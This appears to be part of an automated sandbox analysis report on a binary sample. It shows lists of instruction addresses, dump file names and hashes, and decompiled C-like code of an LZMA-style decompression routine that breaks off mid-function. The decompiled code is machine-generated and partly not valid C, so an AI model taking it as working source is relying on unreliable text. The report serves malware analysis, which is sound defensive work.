                0x00406895
                0x00406a44
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00406840
                0x00406840
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840
                0x00000000
                0x00406595

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
